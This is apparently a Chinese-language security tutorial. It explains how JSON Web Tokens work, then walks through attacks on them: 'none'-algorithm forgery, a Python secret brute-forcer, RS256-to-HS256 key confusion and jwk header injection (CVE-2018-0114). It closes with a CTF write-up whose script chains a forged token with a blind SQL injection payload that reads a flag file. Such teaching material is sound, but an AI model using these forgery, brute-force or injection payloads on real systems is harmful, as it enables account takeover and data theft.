1、JWT简介
JWT(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT可用于身份认证、会话状态维持、信息交换等。
1.1、 JWT优缺点
- JWT的优点:
1、可扩展性好
应用程序分布式部署的情况下,session需要做多机数据共享,通常可以存在数据库或者redis里面。而jwt不需要。
2、无状态 jwt不在服务端存储任何状态
RESTful API的原则之一是无状态,发出请求时,总会返回带有参数的响应,不会产生附加影响。用户的认证状态引入这种附加影响,这破坏了这一原则。另外jwt的载荷中可以存储一些常用信息,用于交换信息,有效地使用 JWT,可以降低服务器查询数据库的次数。 - JWT的缺点:
1、安全性低
由于jwt的payload是使用base64url编码的,可以直接解码,因此jwt中不能存储敏感数据。而session的信息是存在服务端的,相对来说更安全。
2、性能差
jwt太长。由于是无状态使用JWT,所有的数据都被放到JWT里,如果还要进行一些数据交换,那载荷会更大,经过编码之后导致jwt非常长,cookie的限制大小一般是4k,cookie很可能放不下,所以jwt一般放在local storage里面。并且用户在系统中的每一次http请求都会把jwt携带在Header里面,http请求的Header可能比Body还要大。而sessionId只是很短的一个字符串,因此使用jwt的http请求比使用session的开销大得多。
1.2、JWT的构成
JWT token由三部分组成,分别是头部、载荷、签名,中间以点隔开。
Header.Payload.Signature
- Header
header用来声明token的类型和签名用的算法等,需要经过Base64Url编码。
如下:
{"alg":"HS256","typ":"JWT"}
- Payload
payload用来表示真正的token信息,也需要经过Base64Url编码。
有7个字段分别是:
iss (issuer):JWT的发行者
exp (expiration time):过期时间
sub (subject):JWT面向的主题
aud (audience):JWT的用户
nbf (Not Before):生效时间
iat (Issued At):签发时间
jti (JWT ID):JWT唯一标识
支持自定义字段
{
"sub": "123456789",
"id": "98",
"admin": true
}
- Signature
首先这个部分需要BASE64加密后的header和payload,然后使用进行连接组成的字符串,然后通过header中指定的加密方式,进行加盐值secret组合加密,然后就构成了JWT的第三部分。
data = base64urlEncode(header) + "." + base64urlEncode(payload)
signature = HMAC-SHA256(data,secretkey)
Base64URL算法是base64的修改版,是为了方便在web中传输使用了不同的编码表,不会在末尾填充=号,并将+和/分别改为-和_
HMAC算法是密钥相关的哈希运算消息认证码(Hash-based Message Authentication Code)的缩写,它是一种对称加密算法,使用相同的密钥对传输信息进行加解密。
RSA算法则是一种非对称加密算法,使用私钥加密明文,公钥解密密文。
在HMAC和RSA算法中,都是使用私钥对signature字段进行签名,只有拿到了加密时使用的私钥,才有可能伪造token。
RS256 (采用SHA-256 的 RSA 签名) 是一种非对称算法, 它使用公共/私钥对: 标识提供方采用私钥生成签名, JWT 的使用方获取公钥以验证签名。由于公钥 (与私钥相比) 不需要保护, 因此大多数标识提供方使其易于使用方获取和使用 (通常通过一个元数据URL)。
HS256 (带有 SHA-256 的 HMAC 是一种对称算法, 双方之间仅共享一个 密钥。由于使用相同的密钥生成签名和验证签名, 因此必须注意确保密钥不被泄密。
我们通常使用https://jwt.io/来解密jwt。
1.3、JWT认证流程
1、用户使用用户名密码来请求服务器
2、服务器进行验证用户的信息
3、服务器通过验证发送给用户一个JWTtoke
4、客户端存储token,并在每次请求时附送上这个JWTtoken值
5、服务端验证token值,并返回数据
2、JWT存在的安全风险
2.1、敏感信息泄露
payload和header只经过Base64Url编码,如果开放者把一些敏感信息存放到里面,我们可以轻松获得。
使用https://jwt.io/#debugger-io
2.2、未校验签名
某些服务端并未校验JWT签名,所以,可以尝试修改signature后(或者直接删除signature)看其是否还有效。
2.3、签名算法可被修改为none
将 head中alg的值改为none,可能绕过签名认证。
修改前:
{
"alg": "HS256",
"typ": "JWT"
}
修改后:
{
"alg": "none",
"typ": "JWT"
}
服务端接收到token后会将其认定为无加密算法, 于是对signature的检验也就失效了,那么我们就可以随意修改payload部分伪造token。
https://jwt.io/#debugger-io 会识别这种恶意行为,我们可以借助python的pyjwt库实现。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import jwt
payload = {"user":"admin","iat":1612336103}
print(jwt.encode(payload,None,algorithm="none"))
生成的JWT token只存在Header和Payload部分,Signature部分不存在。
2.4、签名密钥可被爆破
alg指定了加密算法,可以进行针对key进行暴力破解。
爆破脚本:https://github.com/Ch1ngg/JWTPyCrack
下面代码也可以
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import jwt
import sys
def burp_jwt(jwt_json,dicts):
with open(dicts) as f:
for line in f:
key = line.strip()
try:
jwt.decode(jwt_json,verify=True,key=key,algorithm='HS256')
print('found key! --> ' + key)
break
except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
print('found key! --> ' + key)
break
except(jwt.exceptions.InvalidSignatureError):
print('verify key! -->' + key)
continue
else:
print("key not found!")
if __name__ == '__main__':
if(len(sys.argv) == 3):
print('User: please burp_jwt.py jwt_json dict.txt')
jwt_json = sys.argv[1]
dicts = sys.argv[2]
burp_jwt(jwt_json,dicts)
else:
print('User: please please burp_jwt.py jwt_json dict.txt')
爆破出key后,就可以任意修改token了
2.5、修改非对称密码算法为对称密码算法
JWT的签名加密算法有两种,对称加密算法和非对称加密算法。
对称加密算法比如HS256,加解密使用同一个密钥,保存在后端。
非对称加密算法比如RS256,后端加密使用私钥,前端解密使用公钥,公钥是我们可以获取到的。
如果我们修改header,将算法从RS256更改为HS256,后端代码会使用RS256的公钥作为HS256算法的密钥。于是我们就可以用RS256的公钥伪造数据
CTF题目:http://demo.sjoerdlangkemper.nl/jwtdemo/rs256.php
2.6、伪造密钥(CVE-2018-0114)
jwk是header里的一个参数,用于指出密钥,存在被伪造的风险。
攻击者可以通过以下方法来伪造JWT:删除原始签名,向标头添加新的公钥,然后使用与该公钥关联的私钥进行签名。
如下:
{
"typ": "JWT",
"alg": "RS256",
"jwk": {
"kty": "RSA",
"kid": "TEST",
"use": "sig",
"e": "AQAB",
"n": "oUGnPChFQAN1xdA1_f_FWZdFAis64o5hdVyFm4vVFBzTIEdYmZZ3hJHsWi5b_m_tjsgjhCZZnPOLn-ZVYs7pce__rDsRw9gfKGCVzvGYvPY1hkIENNeBfSaQlBhOhaRxA85rBkg8BX7zfMRQJ0fMG3EAZhYbr3LDtygwSXi66CCk4zfFNQfOQEF-Tgv1kgdTFJW-r3AKSQayER8kF3xfMuI7-VkKz-yyLDZgITyW2VWmjsvdQTvQflapS1_k9IeTjzxuKCMvAl8v_TFj2bnU5bDJBEhqisdb2BRHMgzzEBX43jc-IHZGSHY2KA39Tr42DVv7gS--2tyh8JluonjpdQ"
}
}
2.7、JWT自动化工具
https://github.com/ticarpi/jwt_tool
3、CTF例题
2020 网鼎杯 玄武组 js_on
admin/admin 弱口令登录得到key
通过查看数据包发现JWT token
对JWT token进行解密,发现使用了hs256对称加密。
当前用户为admin,测试user参数可能存在sql注入。
对空格进行了过滤,使用/**/绕过限制
经过判断注入点类型为布尔型盲注
"user": "admin'/**/and/**/1=1#"
"user": "admin'/**/and/**/1=2#"
通过load_file函数读取跟目录下的flag值
- 关键字之间添加<a>
- 空格使用注释符/**/绕过
admin'/**/and/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),1,1))>32#
利用mid函数一位一位分割,并通过ascii码进行计算
#!/usr/bin/env python3
# coding=utf-8
import jwt
import requests
import re
key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
url = "http://challenge-435b4c15ad92eb0a.sandbox.ctfhub.com:10080/index.php"
payloadTmpl = "admin'/**/and/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"
def sql_jwt():
result = ""
for i in range(1,50):
min = 31
max = 127
while abs(max-min) > 1:
mid = (min + max)//2
payload = payloadTmpl.format(i,mid)
print(payload)
jwttoken = {
"user": payload,
"news": "hello"
}
payload = jwt.encode(jwttoken, key, algorithm='HS256')
cookies = dict(token=str(payload))
res = requests.get(url,cookies=cookies)
if re.findall("hello", res.text) != []:
min = mid
else:
max = mid
result += chr(max)
print(result)
if __name__ == "__main__":
sql_jwt()
运行脚本得到flag
安全建议
- 保证密钥不会泄漏
- 签名算法固定在后端
- JWT中禁止存放敏感信息
- 合理规定JWT的有效时间
参考链接
https://www.freebuf.com/vuls/211842.html
https://zhuanlan.zhihu.com/p/93129166
https://www.jianshu.com/p/60dbcaea510c
